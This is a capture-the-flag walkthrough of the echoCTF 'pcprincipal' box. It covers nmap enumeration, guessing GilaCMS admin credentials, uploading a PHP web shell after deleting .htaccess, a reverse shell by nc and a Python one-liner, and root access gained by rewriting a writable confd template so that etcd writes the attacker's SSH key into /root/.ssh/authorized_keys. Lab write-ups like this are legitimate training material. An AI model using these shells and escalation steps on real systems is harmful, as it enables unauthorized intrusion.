Enumeration With Nmap
nmap -p- --min-rate 10000 -oA nmap/allports -v 10.0.100.32
┌──(muzec㉿Muzec-Security)-[~/Documents/echoctf/pcprincipal]
└─$ cat nmap/allports.nmap
# Nmap 7.91 scan initiated Sat Dec 4 12:57:02 2021 as: nmap -p- --min-rate 10000 -oA nmap/allports -v 10.0.100.32
Increasing send delay for 10.0.100.32 from 0 to 5 due to 79 out of 261 dropped probes since last increase.
Warning: 10.0.100.32 giving up on port because retransmission cap hit (10).
Increasing send delay for 10.0.100.32 from 640 to 1000 due to 172 out of 573 dropped probes since last increase.
Nmap scan report for 10.0.100.32
Host is up (0.16s latency).
Not shown: 41913 closed ports, 23621 filtered ports
PORT STATE SERVICE
80/tcp open http
Read data files from: /usr/bin/../share/nmap
# Nmap done at Sat Dec 4 12:58:07 2021 -- 1 IP address (1 host up) scanned in 65.04 seconds
Default Script/Service Detection.
nmap -sC -sV -oA nmap/normal -p 80 10.0.100.32
┌──(muzec㉿Muzec-Security)-[~/Documents/echoctf/pcprincipal]
└─$ cat nmap/normal.nmap
# Nmap 7.91 scan initiated Sat Dec 4 12:57:17 2021 as: nmap -sC -sV -oA nmap/normal -p 80 10.0.100.32
Nmap scan report for 10.0.100.32
Host is up (0.20s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 4 12:57:31 2021 -- 1 IP address (1 host up) scanned in 13.72 seconds
Seems we are dealing with HTTP which is cool lol so i can show off some new tools which i found interesting from echotrust with out to much of talks let jump in. Now let check what we have on the port 80 .
lynx http://10.0.100.32/
Lynx
Lynx is a terminal-based web browser for all Linux distributions. It shows the result as plain text on the terminal. It is a classic non-graphical text-mode web browser which displays the pages on the terminal. Lynx does not load images and multimedia contents, hence it is fast as compared to other browsers.
Cool right yes i know so we know we are dealing with gilacms i look around to see if i can get right version but damn nothing it was well hidden i guess or removed let see if i can guess the admin page.
lynx http://10.0.100.32/gila/admin
Boom seems we are right now let hit the browser.
But man seems we need a credentials i try all the default one but none work so we get a hint let read it.
There is a need to brute force http://pcprincipal.echocity-f.com/ for username and password but it should be easy to find in the 3rd try., The domain you're going to need is @pcprincipal.echocity-f.com and the password is given to you on the frontpage as a domain...
Now it getting interesting so we know now that the username is admin@pcprincipal.echocity-f.com so for the password we should be able to guess it.
Mama we are in and guess what we have the version ok they should be a way around to upload a shell to get RCE.
Click on content > file manager .
We have the config.php file but not that helpful let try uploading a php file and see.
Bournce back hmmm seems we have no permission to upload file there let find a place which we can abuse to upload our malicious file.
┌──(muzec㉿Muzec-Security)-[~/Documents/echoctf/pcprincipal]
└─$ vi shell.php
┌──(muzec㉿Muzec-Security)-[~/Documents/echoctf/pcprincipal]
└─$ cat shell.php
<?php system ($_GET['cmd']) ?>
Now we just need a place to upload it look through folder and i was able to upload on the tmp folder which is cool.
Now let try to access it from outside but man i got 403 forbidden .
Let try see if i can modified the .htaccess or delete it. Trying to edit no luck but delete yes luck lol.
Deleted now let try to access it.
Boom we can execute a command on the remote host now let get back a reverse shell back to our terminal.
Python One Liner Reverse shell Or Ncat.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.
OR
nc -e /bin/bash 10.10.10.0 1337
Now back to check our listener.
Now we have shell which is cool let check kernal version and some other stuffs and way to move our privilege to root.
Quite alright it running debian cool let check some running processes.
www-data@pcprincipal:/var/www/html/gila/tmp$ ps -auxwwwwww
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 3732 2816 ? Ss Dec07 0:00 /bin/bash /entrypoint.sh tail -f /var/log/supervisor/supervisord.log /var/log/supervisor/confd.log
root 42 0.0 0.0 2384 1640 ? S Dec07 0:00 /bin/sh /usr/bin/mysqld_safe
mysql 159 0.0 3.9 1255420 81816 ? Sl Dec07 0:25 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/x86_64-linux-gnu/mariadb19/plugin --user=mysql --skip-log-error --pid-file=/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock
root 160 0.0 0.0 4704 1072 ? S Dec07 0:00 logger -t mysqld -p daemon error
root 234 0.0 0.3 15848 6960 ? Ss Dec07 0:00 /usr/sbin/sshd
root 237 0.0 0.1 8492 3108 ? Ss Dec07 0:00 tmux new -d -s 0 /usr/bin/etcd
root 238 0.2 1.1 11201756 24300 pts/0 Ssl+ Dec07 2:47 /usr/bin/etcd
root 284 0.0 0.1 3780 2920 pts/1 Ss+ Dec07 0:00 /bin/bash /usr/local/bin/etcd-feeder.sh
root 318 0.0 1.0 215060 21400 ? Ss Dec07 0:02 /usr/sbin/apache2 -k start
www-data 321 0.0 0.7 215400 16208 ? S Dec07 0:00 /usr/sbin/apache2 -k start
www-data 322 0.0 0.7 215304 15844 ? S Dec07 0:01 /usr/sbin/apache2 -k start
www-data 323 0.0 0.7 215404 16244 ? S Dec07 0:00 /usr/sbin/apache2 -k start
www-data 324 0.0 0.7 215400 15432 ? S Dec07 0:01 /usr/sbin/apache2 -k start
www-data 325 0.0 0.7 215400 16072 ? S Dec07 0:00 /usr/sbin/apache2 -k start
root 337 0.0 0.8 26752 16868 ? Ss Dec07 0:07 /usr/bin/python2 /usr/bin/supervisord -c /etc/supervisor/supervisord.conf
root 339 0.0 0.0 2384 736 ? S Dec07 0:00 /bin/sh -c rm -f /etc/confd/conf.d/etsctf_authorized_keys.toml; install -o root -g root -m 0666 /etc/confd/conf.d/etsctf_authorized_keys.toml.bk /etc/confd/conf.d/etsctf_authorized_keys.toml; /work/src/github.com/kelseyhightower/confd/bin/confd
root 347 0.0 0.0 2324 724 ? S Dec07 0:02 tail -f /var/log/supervisor/supervisord.log /var/log/supervisor/confd.log
root 348 0.0 1.0 645516 21508 ? Sl Dec07 0:09 /work/src/github.com/kelseyhightower/confd/bin/confd
www-data 1643 0.0 0.7 215400 16308 ? S Dec07 0:01 /usr/sbin/apache2 -k start
www-data 10791 0.0 0.7 215400 15756 ? S 11:06 0:00 /usr/sbin/apache2 -k start
www-data 12894 0.0 0.0 2384 736 ? S 12:00 0:00 sh -c nc -e /bin/bash 10.10.0.186 1337
www-data 12895 0.0 0.1 3732 2668 ? S 12:00 0:00 bash
www-data 12897 0.0 0.3 14064 8060 ? S 12:00 0:00 python3 -c import pty; pty.spawn('/bin/bash')
www-data 12898 0.0 0.1 4092 3316 pts/2 Ss 12:00 0:00 /bin/bash
root 13006 0.0 0.0 2292 724 pts/1 S+ 12:03 0:00 sleep 360
www-data 13155 0.0 0.1 7864 2812 pts/2 R+ 12:07 0:00 ps -auxwwwwww
www-data@pcprincipal:/var/www/html/gila/tmp$
Some strange process confd seems we need to focus on that.
ETCD & CONFD
Confd is a lightweight configuration management tool. By querying Etcd, combining with the configuration template engine, it keeps the local configuration up to date, and has a regular detection mechanism to automatically reload configuration changes.
The default configuration folder is under /etc/confd so let change directory to the folder.
seems etsctf_authorized_keys.toml is writable so let see what we have in it.
www-data@pcprincipal:/etc/confd/conf.d$ cat etsctf_authorized_keys.toml
[template]
uid = 1001
mode = "0400"
src = "authorized_keys.tmpl"
dest = "/home/ETSCTF/.ssh/authorized_keys"
keys = [
"/ETSCTF/authorized_keys",
]
www-data@pcprincipal:/etc/confd/conf.d$
We have uid which is the user id ETSCTF we want the file to be owned, a mode for permissions, an src template, a destination file dest and the keys that will be queried for i think.
I think this seems to be our way to escalate. These two files are responsible for generating an authorized_keys file for the user ETSCTF with the value of the etcd key /ETSCTF/authorized_keys.
So the new plan is to change the toml file in order to generate the ssh keys for the user root.
www-data@pcprincipal:/etc/confd/conf.d$ cat etsctf_authorized_keys.toml
[template]
uid = 0
mode = "0644"
src = "authorized_keys.tmpl"
dest = "/root/.ssh/authorized_keys"
keys = [
"/ETSCTF/authorized_keys",
]
Now the next step to generate SSH key.
www-data@pcprincipal:/tmp$ cd /tmp
www-data@pcprincipal:/tmp$ mkdir .ssh
www-data@pcprincipal:/tmp$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/var/www/.ssh/id_rsa): /tmp/.ssh/id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /tmp/.ssh/id_rsa.
Your public key has been saved in /tmp/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:4/adt/ftoqKFT03my39IBGfIOX8Et0O5OV1d/+5JJIU www-data@pcprincipal.echocity-f.com
The key's randomart image is:
+---[RSA 2048]----+
| . o.o*|
| * =o*|
| E =*|
| ++=|
| S oo oo|
| . o = +. |
| + o o. o.|
| . =.o o=.=|
| ..o.*+oB*|
+----[SHA256]-----+
www-data@pcprincipal:/tmp$
Now let set up the public key with;
etcdctl set /ETSCTF/authorized_keys "$(</tmp/.ssh/id_rsa.pub)";
www-data@pcprincipal:/tmp$ etcdctl set /ETSCTF/authorized_keys "$(</tmp/.ssh/id_rsa.pub)";
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZM8jwVsQmpgDjoecnszJI6uji8aPI17AQx4y/TnuPfCP3z+fijaJYLYuyOKFZ+/ViZDnRY0m+/cFm8EBElpIFZhc4VeII23xjjqdhAoe+k90iFJ8ZJiyFb/8igw+fxw2796eaFEmCpkV8ct2BCiJ4KO9v4uWX2Fc+9pxDeR1rwfHYfokaqFL4Iz6oOLx0TmONGCFvoHcCTScTUvRiCY+mVj5QyXAcBTLA5ipXAVF4dOxxdyM/8NSwf4g4u4Y60uXE+HUAwH9jAETdz7p/KLdZbsXJcNgY5uNquGLtkIgr7CNiCkJNMfOrRf4XBBZMVYFiK4teec+PNN/oMFxflI1R www-data@pcprincipal.echocity-f.com
www-data@pcprincipal:/tmp$ cd .ssh
www-data@pcprincipal:/tmp/.ssh$ ls
id_rsa id_rsa.pub
www-data@pcprincipal:/tmp/.ssh$ chmod 600 id_rsa
Now let try using SSH with the private key to access the root user.
ssh -i id_rsa root@localhost
Do we have SSH port open locally?? Yes we do.
www-data@pcprincipal:/tmp/.ssh$ ss -tulpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 127.0.0.11:41712 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.11:45549 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:22 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:2379 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:2380 0.0.0.0:*
www-data@pcprincipal:/tmp/.ssh$
Now let hit it.
Boom in and done.
Greeting From Muzec